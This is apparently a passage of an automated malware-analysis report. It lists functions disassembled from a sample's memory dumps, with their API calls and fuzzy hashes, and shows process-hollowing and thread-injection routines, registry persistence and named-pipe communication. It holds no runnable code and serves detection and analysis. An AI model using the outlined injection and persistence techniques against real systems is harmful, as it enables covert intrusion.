  • CloseHandle.KERNEL32(001EAF58), ref: 001C1809
  • DeleteFileW.KERNEL32(00000000,?,?,?,?,00000000), ref: 001C1816
  • GetLastError.KERNEL32(?,?,?,00000000), ref: 001C1820
  • RegCloseKey.ADVAPI32(?,?,?,?,00000000), ref: 001C187D
  • RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 001C189C
  • SuspendThread.KERNEL32(00000000), ref: 001C18AA
  • CreateEventA.KERNEL32(001EB0D8,00000001,00000000), ref: 001C18BE
  • SetEvent.KERNEL32(00000000), ref: 001C18CB
  • CloseHandle.KERNEL32(00000000), ref: 001C18D2
  • Sleep.KERNEL32(000001F4), ref: 001C18E5
  • ResumeThread.KERNEL32(00000000), ref: 001C1909
    • Part of subcall function 001D9A9C: RegCloseKey.ADVAPI32(?,00000000), ref: 001D9B23
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C1A08, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 122 Total matches: 58memorythreadstring
Similarity
  • Total matches: 58
  • API ID: HeapFree$GetCurrentThreadGetCurrentThreadIdRtlAllocateHeapRtlImageNtHeaderlstrlenwsprintf
  • String ID: W
  • API String ID: 3968678070-655174618
  • Opcode ID: 65c7814ccee3740933dfcccc29e4eab5d936ac043747db4873335771aa46cfd7
  • Instruction ID: 5d65c5167d05eb071b61c740fb2aa7fd16767ced16d889d5a98f858644bbd093
  • Opcode Fuzzy Hash: 8901B138088895A7C06790614063FBFD6017F822D0C4DF712F9693819E2F4372D35B57
  • Instruction Fuzzy Hash: 5d65c5167d05eb071b61c740fb2aa7fd16767ced16d889d5a98f858644bbd093
APIs
  • RtlImageNtHeader.NTDLL ref: 001C1A48
  • GetCurrentThreadId.KERNEL32 ref: 001C1A5E
  • GetCurrentThread.KERNEL32 ref: 001C1A6F
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C1966: lstrlen.KERNEL32(?,00000001,?,?,?,00000001,?,?), ref: 001C19D1
    • Part of subcall function 001C1966: HeapFree.KERNEL32(00000000,00000000), ref: 001C19F9
  • HeapFree.KERNEL32(00000000,?,00000000), ref: 001C1AE3
  • HeapFree.KERNEL32(00000000,00000020,00000000), ref: 001C1AF3
  • RtlAllocateHeap.NTDLL(00000000,00000400), ref: 001C1B3F
  • wsprintfA.USER32 ref: 001C1B50
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C1B5B
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C1B75
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B32CD0, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 108 Total matches: 183string
Similarity
  • Total matches: 183
  • API ID: lstrcpy$CoInitializeExCoUninitializePathFindExtensionShellExecuteExlstrlenmemsetwsprintf
  • String ID: <
  • API String ID: 1457465641-4251816714
  • Opcode ID: 36c43c169b7f4adfcc7eed8db55d242cf47c4c2cff2d35238d5400cc3024a577
  • Instruction ID: 3de0f454e75166d7dc89cb568257ea8f04ae800c90f99e8cafab956dcc2645f6
  • Opcode Fuzzy Hash: 93F078708B2E8BC1CD9158C9160535692C06F30E68E9C9B137824F966B6B20312C9F9D
  • Instruction Fuzzy Hash: 3de0f454e75166d7dc89cb568257ea8f04ae800c90f99e8cafab956dcc2645f6
APIs
  • memset.NTDLL ref: 01B32CEE
  • CoInitializeEx.OLE32(00000000,00000002), ref: 01B32CF9
  • PathFindExtensionW.SHLWAPI(00000000), ref: 01B32D14
  • lstrcpyW.KERNEL32(00000000,01B38224), ref: 01B32D29
  • lstrlen.KERNEL32(01B37494,?,?,?,?,?,?,?,?,?,?,01B318D7,?), ref: 01B32D46
  • lstrcpyW.KERNEL32(00000000,01B384B8), ref: 01B32D77
    • Part of subcall function 01B3115C: RtlAllocateHeap.NTDLL(00000000,?,01B33CA0), ref: 01B31168
  • wsprintfW.USER32 ref: 01B32DAE
  • ShellExecuteExW.SHELL32(0000003C), ref: 01B32DE3
  • CoUninitialize.OLE32 ref: 01B32DF7
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
Strings
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001C20A7, Relevance: 15.2, APIs: 10, Instructions: 171 Total matches: 60memorystringthread
Similarity
  • Total matches: 60
  • API ID: HeapFree$lstrlenmemcpy$RtlAllocateHeapSwitchToThreadlstrcpy
  • String ID:
  • API String ID: 732536130-0
  • Opcode ID: a427ae31280889244c8d76e620d9b5f9788be67866348582a82e8a58517c2dc5
  • Instruction ID: a2cec6491fe12f34e3abab1a275dd9d209e051195fd81796f6ed6d95fe43367f
  • Opcode Fuzzy Hash: 90116D11582D32C3D113B46AC1E8B7EFA45FF961D6C1F3001E9127510E4A935EF6AB6E
  • Instruction Fuzzy Hash: a2cec6491fe12f34e3abab1a275dd9d209e051195fd81796f6ed6d95fe43367f
APIs
    • Part of subcall function 001C3B4A: HeapFree.KERNEL32(00000000,?,?), ref: 001C3BCD
  • lstrlen.KERNEL32(?,?,?,00000001), ref: 001C216D
  • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001C218F
  • lstrcpy.KERNEL32(00000020,?), ref: 001C21AE
  • lstrlen.KERNEL32(?), ref: 001C21B8
  • memcpy.NTDLL(?,?,?), ref: 001C21F9
  • memcpy.NTDLL(?,?,?), ref: 001C220C
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C224F
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
  • SwitchToThread.KERNEL32(?,00000000,?,?), ref: 001C2230
    • Part of subcall function 001C2B66: memset.NTDLL ref: 001C2BCA
    • Part of subcall function 001C2B66: CloseHandle.KERNEL32(?), ref: 001C2C13
    • Part of subcall function 001C2B66: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C2DC7
    • Part of subcall function 001C2B66: GetLastError.KERNEL32(?,00000000,?), ref: 001C3013
  • HeapFree.KERNEL32(00000000,?,?), ref: 001C2275
  • HeapFree.KERNEL32(00000000,?,?), ref: 001C2291
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DB838, Relevance: 15.1, APIs: 10, Instructions: 64 Total matches: 62sleepsynchronization
Similarity
  • Total matches: 62
  • API ID: CloseHandle$LocalFreeRtlDeleteCriticalSectionRtlEnterCriticalSectionRtlLeaveCriticalSectionSetEventSleepWaitForSingleObject
  • String ID:
  • API String ID: 1546928802-0
  • Opcode ID: 44cbb82d1bc8bc2d29e416fe044868003d437d2d6ba21b65bae40637e45a7bca
  • Instruction ID: 191c3ac2f4053567846d1cc33e924360c7a86817a4ea2a5247009256dd1e7f80
  • Opcode Fuzzy Hash: 18E02BA421196647D99708B00461B1FAE82BBE23E484C3303F552A25C2BB0712C4DF2A
  • Instruction Fuzzy Hash: 191c3ac2f4053567846d1cc33e924360c7a86817a4ea2a5247009256dd1e7f80
APIs
  • SetEvent.KERNEL32(?,001C1F1A,?,001EB068,?,00000000,001C13EB), ref: 001DB84C
    • Part of subcall function 001DAF5A: InterlockedExchange.KERNEL32(001C13EB,000000FF), ref: 001DAF61
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 001DB866
  • CloseHandle.KERNEL32(?), ref: 001DB86F
  • CloseHandle.KERNEL32(?), ref: 001DB87D
  • RtlEnterCriticalSection.NTDLL(00000008), ref: 001DB889
  • RtlLeaveCriticalSection.NTDLL(00000008), ref: 001DB8B2
  • Sleep.KERNEL32(000001F4), ref: 001DB8C1
  • CloseHandle.KERNEL32(?), ref: 001DB8CE
  • LocalFree.KERNEL32(?), ref: 001DB8DC
  • RtlDeleteCriticalSection.NTDLL(00000008), ref: 001DB8E6
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DAFC4, Relevance: 13.8, APIs: 9, Instructions: 278 Total matches: 59memorythread
Similarity
  • Total matches: 59
  • API ID: GetLastError$VirtualAlloc$RtlEnterCriticalSectionRtlLeaveCriticalSectionSwitchToThread
  • String ID:
  • API String ID: 2452875170-0
  • Opcode ID: f7250d7c747c6724e85bc87f4a1d164c9bcb3d791413c0bfd27e5859a3665385
  • Instruction ID: e9cda0ef1bba535e69377ecfbf93933b7da227d9232d932a7ffe86fd6aa33c96
  • Opcode Fuzzy Hash: F931CCA2419FC2A7D5936A400890BBAC5C3FB12FF6D6CA732B674A02C81FC5274D2F54
  • Instruction Fuzzy Hash: e9cda0ef1bba535e69377ecfbf93933b7da227d9232d932a7ffe86fd6aa33c96
APIs
  • VirtualAlloc.KERNEL32(00000000,00008000,00003000,00000004), ref: 001DB03B
  • VirtualAlloc.KERNEL32(00000000,00008000,00003000,00000004), ref: 001DB05A
  • GetLastError.KERNEL32 ref: 001DB20B
  • GetLastError.KERNEL32 ref: 001DB28D
  • SwitchToThread.KERNEL32(?,?,?,?), ref: 001DB2D2
    • Part of subcall function 001DAF5A: InterlockedExchange.KERNEL32(001C13EB,000000FF), ref: 001DAF61
  • GetLastError.KERNEL32 ref: 001DB308
  • GetLastError.KERNEL32 ref: 001DB317
  • RtlEnterCriticalSection.NTDLL(?), ref: 001DB327
  • RtlLeaveCriticalSection.NTDLL(?), ref: 001DB338
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CAC3A, Relevance: 13.6, APIs: 9, Instructions: 124 Total matches: 61memorystring
Similarity
  • Total matches: 61
  • API ID: memcpy$RtlAllocateHeapmemset$HeapFreelstrcmpi
  • String ID:
  • API String ID: 2612869081-0
  • Opcode ID: c2dacee3140373e500c22aac8ec47d9c8ec65dfe813f0c9f26dc5badd2c4d201
  • Instruction ID: 2a6ed72f7be82828a989acab500aa79ad59f26800ec0c1f59594e6530e87086a
  • Opcode Fuzzy Hash: 4201C028044DC281C42710841061FF9A506EFD13B5C8CAB76DDA13F08B5D0273F53797
  • Instruction Fuzzy Hash: 2a6ed72f7be82828a989acab500aa79ad59f26800ec0c1f59594e6530e87086a
APIs
    • Part of subcall function 001C57CC: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C57D4
    • Part of subcall function 001C57CC: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C57E9
    • Part of subcall function 001C57CC: InterlockedIncrement.KERNEL32(0000001C), ref: 001C5802
  • RtlAllocateHeap.NTDLL(00000000,00000018,001ED278), ref: 001CAC70
  • memset.NTDLL ref: 001CAC81
  • lstrcmpi.KERNEL32(?,?), ref: 001CACC1
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001CACEA
  • memcpy.NTDLL(00000000,?,?), ref: 001CACFE
  • memset.NTDLL ref: 001CAD0B
  • memcpy.NTDLL(?,?,?,?,00000000,?,00000000,?,?), ref: 001CAD24
  • memcpy.NTDLL(-00000005,001EC42B,00000007,?,?,?,?,00000000,?,00000000,?,?), ref: 001CAD3F
  • HeapFree.KERNEL32(00000000,?), ref: 001CAD5C
    • Part of subcall function 001C7AF2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 001C7B06
    • Part of subcall function 001C7AF2: memcpy.NTDLL(00000000,001C7C21,?,?,00000008,?,001C7C21,00000000,00000000,?), ref: 001C7B2F
    • Part of subcall function 001C7AF2: RegCloseKey.ADVAPI32(?,?,001C7C21,00000000,00000000,?,?,?,?,?,?,?,?,00000008,001C77AB,00000000), ref: 001C7B81
    • Part of subcall function 001C5761: InterlockedDecrement.KERNEL32(0000001C), ref: 001C5765
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CB593, Relevance: 13.6, APIs: 9, Instructions: 115 Total matches: 61memorystring
Similarity
  • Total matches: 61
  • API ID: RtlAllocateHeaplstrlen$HeapFree_wcsuprlstrcatlstrcpymemcpy
  • String ID:
  • API String ID: 1573093752-0
  • Opcode ID: f08ef74051028bad1df3046b05b27150d2409501bab8048f9561d94f45d3640f
  • Instruction ID: 49f792a003b958594b94fef63a2c1694da6c43edfde979eb277695decca324f2
  • Opcode Fuzzy Hash: F9F0FEB01D1901DB8023453EE06037DE502AC442E2B1C8617FD80B525F7F4372E0BF59
  • Instruction Fuzzy Hash: 49f792a003b958594b94fef63a2c1694da6c43edfde979eb277695decca324f2
APIs
  • lstrlenW.KERNEL32(00000000), ref: 001CB606
  • RtlAllocateHeap.NTDLL(00000000,001EAC82), ref: 001CB61C
  • memcpy.NTDLL(00000000,00000000,001EAC80), ref: 001CB62F
  • _wcsupr.NTDLL ref: 001CB63A
  • lstrlenW.KERNEL32(?,001EAC80), ref: 001CB66C
  • RtlAllocateHeap.NTDLL(00000000,?,001EAC80), ref: 001CB681
  • lstrcpyW.KERNEL32(00000000,?), ref: 001CB697
  • lstrcatW.KERNEL32(00000000,001EC940), ref: 001CB6B5
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CB6C4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C4CEB, Relevance: 13.6, APIs: 9, Instructions: 94 Total matches: 33filememorystring
Similarity
  • Total matches: 33
  • API ID: lstrlen$CloseHandleDeleteFileHeapFreeMapViewOfFileRtlAllocateHeapUnmapViewOfFilewcstombs
  • String ID:
  • API String ID: 3071814901-0
  • Opcode ID: d05e3ff4273796c9b17326ba3024fd4693d54f1ec967c9ade7a5abc202e65e4f
  • Instruction ID: 7e783e8648c44d89f659e24c24dcd4eaacf23487424efcd1c96aaf08dceaf5d1
  • Opcode Fuzzy Hash: 8DF08B71654AC2CBD22778A6A6517BBF901FB532C3C4E3732DC40251681F4232D22B1B
  • Instruction Fuzzy Hash: 7e783e8648c44d89f659e24c24dcd4eaacf23487424efcd1c96aaf08dceaf5d1
APIs
    • Part of subcall function 001C7262: memset.NTDLL ref: 001C7284
    • Part of subcall function 001C7262: lstrlenW.KERNEL32(?,?,?,?,?,?), ref: 001C72C8
    • Part of subcall function 001C7262: OpenFileMappingA.KERNEL32(80000000,00000000,?), ref: 001C730E
    • Part of subcall function 001C7262: CloseHandle.KERNEL32(?), ref: 001C7331
  • MapViewOfFile.KERNEL32(?,00000004,00000000,00000000,?,?,?,?), ref: 001C4D32
  • CloseHandle.KERNEL32(?), ref: 001C4D3E
  • lstrlenW.KERNEL32(00000000), ref: 001C4D58
  • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C4D69
  • wcstombs.NTDLL ref: 001C4D7A
  • lstrlen.KERNEL32(?), ref: 001C4D87
    • Part of subcall function 001D9462: lstrlen.KERNEL32(-00000002,00000000,?,-00000002,-00000002,?,001C4D99), ref: 001D9472
    • Part of subcall function 001DDE6F: RtlAllocateHeap.NTDLL ref: 001DDEA1
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,001EC117), ref: 001DDF4F
    • Part of subcall function 001DDE6F: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001DDFC7
    • Part of subcall function 001DDE6F: StrTrimA.SHLWAPI(00000000,001E53C8), ref: 001DE039
    • Part of subcall function 001DDE6F: lstrcpy.KERNEL32(00000000,00000000), ref: 001DE061
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,?), ref: 001DE06F
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,00000000), ref: 001DE07F
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,?), ref: 001DE12C
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,001EB1C0), ref: 001DE176
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,00000000,001ED2CA), ref: 001DE185
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,?), ref: 001DE197
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,00000000), ref: 001DE1AD
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?), ref: 001DE1BC
  • UnmapViewOfFile.KERNEL32(?,?,?,?,00000000,00000001), ref: 001C4DBC
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C4DCE
  • DeleteFileW.KERNEL32(?), ref: 001C4DDC
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C164D, Relevance: 13.6, APIs: 9, Instructions: 89 Total matches: 49memoryregistrystring
Similarity
  • Total matches: 49
  • API ID: GetTickCountHeapFreeRegCloseKeyRegCreateKeyRtlAllocateHeapRtlImageNtHeaderStrRChrlstrlenwsprintf
  • String ID:
  • API String ID: 473458267-0
  • Opcode ID: 21cd21af9a4aaeb0892998a3b8bf2ca0770d14e129f35d2f1317603fddf0a3d6
  • Instruction ID: 233c1588e08a29c017db756c2c3cc83d8e7a4f483530507245655a67d20bfa99
  • Opcode Fuzzy Hash: 82F05935850C435DC06788E5483AB3BE6417B002D8DDC6A33F9416D2066F8332969B6B
  • Instruction Fuzzy Hash: 233c1588e08a29c017db756c2c3cc83d8e7a4f483530507245655a67d20bfa99
APIs
  • RtlImageNtHeader.NTDLL(?), ref: 001C165E
  • RtlAllocateHeap.NTDLL(00000000,00000011), ref: 001C1685
  • GetTickCount.KERNEL32 ref: 001C169C
  • wsprintfA.USER32 ref: 001C16AC
  • RegCreateKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C16E0
  • StrRChrA.SHLWAPI(00000000,00000000,00000000), ref: 001C16F8
  • lstrlen.KERNEL32(00000000), ref: 001C1702
  • RegCloseKey.ADVAPI32(?), ref: 001C171E
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C172C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CB978, Relevance: 13.6, APIs: 9, Instructions: 82 Total matches: 110file
Similarity
  • Total matches: 110
  • API ID: GetLastError$CancelIoCloseHandleCreateEventGetOverlappedResultReadFileWaitForMultipleObjectsWriteFile
  • String ID:
  • API String ID: 340323113-0
  • Opcode ID: c76374ab722defcc6b7910d2b5a917f55ad2d99158a8d4548ff4996c05cdb32e
  • Instruction ID: 4663223eb685f44cb7c3c2feaea3cf8fb5c10da6263795c37b1e1976f57e1679
  • Opcode Fuzzy Hash: B7E05C3D03050183442319B00225F9BAF186F662C7A8C33E2FE84CD6975B01BBE58152
  • Instruction Fuzzy Hash: 4663223eb685f44cb7c3c2feaea3cf8fb5c10da6263795c37b1e1976f57e1679
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000001,00000000,001CBA84,00000008,?,00000010,00000001,00000000,0000012B), ref: 001CB997
  • WriteFile.KERNEL32(?,00000001,?,?,?), ref: 001CB9CB
  • ReadFile.KERNEL32(?,00000001,?,?,?), ref: 001CB9D3
  • GetLastError.KERNEL32 ref: 001CB9DD
  • WaitForMultipleObjects.KERNEL32(00000002,00000000,00000000,00002710), ref: 001CB9F9
  • GetOverlappedResult.KERNEL32(?,?,?,00000000), ref: 001CBA12
  • CancelIo.KERNEL32(?), ref: 001CBA27
  • CloseHandle.KERNEL32(?), ref: 001CBA37
  • GetLastError.KERNEL32 ref: 001CBA3F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B31224, Relevance: 13.6, APIs: 9, Instructions: 77 Total matches: 182registrymemorystring
Similarity
  • Total matches: 182
  • API ID: HeapFreePathFindFileNameRegCloseKeyRegOpenKeyExRegQueryValueExRtlAllocateHeapStrStrIlstrcmpilstrlen
  • String ID:
  • API String ID: 1756712956-0
  • Opcode ID: 7849c8b9b33a94634046e8246dea9d068437be0b98cf428e6df4f247afe7f281
  • Instruction ID: 18e037570c349af28e5fb9d2891916f9b52bff2a0339ffa6542edc82ff0ccd9b
  • Opcode Fuzzy Hash: F1F0278087CDC3C3CA49888A09653622058EFE2B45CBC9398B4803901C1FA03D6A2B8E
  • Instruction Fuzzy Hash: 18e037570c349af28e5fb9d2891916f9b52bff2a0339ffa6542edc82ff0ccd9b
APIs
  • PathFindFileNameW.SHLWAPI(01B3618C), ref: 01B31246
  • lstrcmpiW.KERNEL32(00000000,?,01B37494), ref: 01B3124D
  • RegOpenKeyExA.ADVAPI32(80000001,01B38080,00000000,00000000,?,?,01B37494), ref: 01B3127E
  • lstrlenW.KERNEL32(?,01B37494), ref: 01B31292
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 01B312AA
  • RegQueryValueExW.ADVAPI32(?,00000000,01B37494,00000000,01B37494,?,01B37494), ref: 01B312C9
  • StrStrIW.SHLWAPI(00000000), ref: 01B312E4
  • HeapFree.KERNEL32(00000000,00000000), ref: 01B312F9
  • RegCloseKey.ADVAPI32(?,?,01B37494), ref: 01B31302
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001DC371, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 109 Total matches: 97threadsynchronizationinjection
Similarity
  • Total matches: 97
  • API ID: ResumeThread$GetLastErrorSuspendThreadWaitForSingleObjectmemset
  • String ID: d
  • API String ID: 307323562-2564639436
  • Opcode ID: 3424cbb1137d2442c81198497add0441f4db132d4a2ce8cb8b6f8920268ef235
  • Instruction ID: b8db2ac21e3ce66b9afee30e9f9d0f5fd3c10acb7799db9a356edd2bebb0603d
  • Opcode Fuzzy Hash: 76018E064AAA7143C6022C158545FBAF186EB03FB9C5CF710D560304CE0B4574E1F669
  • Instruction Fuzzy Hash: b8db2ac21e3ce66b9afee30e9f9d0f5fd3c10acb7799db9a356edd2bebb0603d
APIs
  • memset.NTDLL ref: 001DC393
    • Part of subcall function 001D8325: GetModuleHandleA.KERNEL32(001EC01D,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D833F
    • Part of subcall function 001D8325: GetProcAddress.KERNEL32(00000000,001EDA66,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D8350
    • Part of subcall function 001D8325: OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D836D
    • Part of subcall function 001D8325: IsWow64Process.KERNELBASE(00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D837E
    • Part of subcall function 001D8325: CloseHandle.KERNEL32(00000000), ref: 001D8391
    • Part of subcall function 001D90C0: RtlNtStatusToDosError.NTDLL(C0000002), ref: 001D90ED
    • Part of subcall function 001D90C0: SetLastError.KERNEL32(00000000,?,001DC3F5,00000000,?,00010007,00000004,?), ref: 001D90F4
  • ResumeThread.KERNEL32(?,00000000,?,?,00000000,?,00010007,00000004,?), ref: 001DC42A
  • WaitForSingleObject.KERNEL32(00000064), ref: 001DC438
  • SuspendThread.KERNEL32(?), ref: 001DC450
    • Part of subcall function 001D909F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D90B7
    • Part of subcall function 001DC212: memset.NTDLL ref: 001DC240
    • Part of subcall function 001DC212: ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 001DC2CA
    • Part of subcall function 001DC212: WaitForSingleObject.KERNEL32(00000064), ref: 001DC2D8
    • Part of subcall function 001DC212: SuspendThread.KERNEL32(?), ref: 001DC2EB
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
  • GetLastError.KERNEL32(00000000,?,00010007,00000004,?), ref: 001DC4C5
  • ResumeThread.KERNEL32(00000004), ref: 001DC4D6
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C3996, Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 105 Total matches: 51registryfilememory
Similarity
  • Total matches: 51
  • API ID: CreateFileGetLastErrorHeapFreeRegCloseKeyRegOpenKey
  • String ID: [FILE]$[FILE]
  • API String ID: 3351174444-3230400787
  • Opcode ID: 033c4394e70e99a6bf63e685e4473468f8b4c093a00da4e8f42c8e7bfe120adf
  • Instruction ID: 2fcb9902772c4c4d4bc9c17d65ab76f3f424010ff8a5c77d50f6198a202490f7
  • Opcode Fuzzy Hash: 85F0DD3A594EC3CFD423249020157BAC805FB412E2CAD2716EA807E1C16F8333192F17
  • Instruction Fuzzy Hash: 2fcb9902772c4c4d4bc9c17d65ab76f3f424010ff8a5c77d50f6198a202490f7
APIs
  • RegOpenKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C39AA
    • Part of subcall function 001D9A9C: RegCloseKey.ADVAPI32(?,00000000), ref: 001D9B23
    • Part of subcall function 001D9EAA: lstrlenW.KERNEL32(00000000,00000000,00000000,.dll,001C2B1B,00000000,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001D9EB8
    • Part of subcall function 001D9EAA: lstrlen.KERNEL32(DllRegisterServer), ref: 001D9EC6
    • Part of subcall function 001D9EAA: RtlAllocateHeap.NTDLL(00000000,00000022), ref: 001D9EDB
    • Part of subcall function 001D95E9: lstrlenW.KERNEL32(?,00000000,001EAC80,?,?,?,001C1784,00000000,?,001C17F3,?,?,?,?,00000000), ref: 001D95F5
    • Part of subcall function 001D95E9: memcpy.NTDLL(00000000,?,00000000,00000002,?,?,?,001C1784,00000000,?,001C17F3,?,?,?,?,00000000), ref: 001D961D
    • Part of subcall function 001D95E9: memset.NTDLL ref: 001D962F
    • Part of subcall function 001C28FD: RegOpenKeyA.ADVAPI32(80000001,001EC2F4,00000000), ref: 001C2917
    • Part of subcall function 001C28FD: lstrcmpiW.KERNEL32(00001000,00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000), ref: 001C294D
    • Part of subcall function 001C28FD: lstrlenW.KERNEL32(00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000), ref: 001C295A
    • Part of subcall function 001C28FD: RegCloseKey.ADVAPI32(00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C29B0
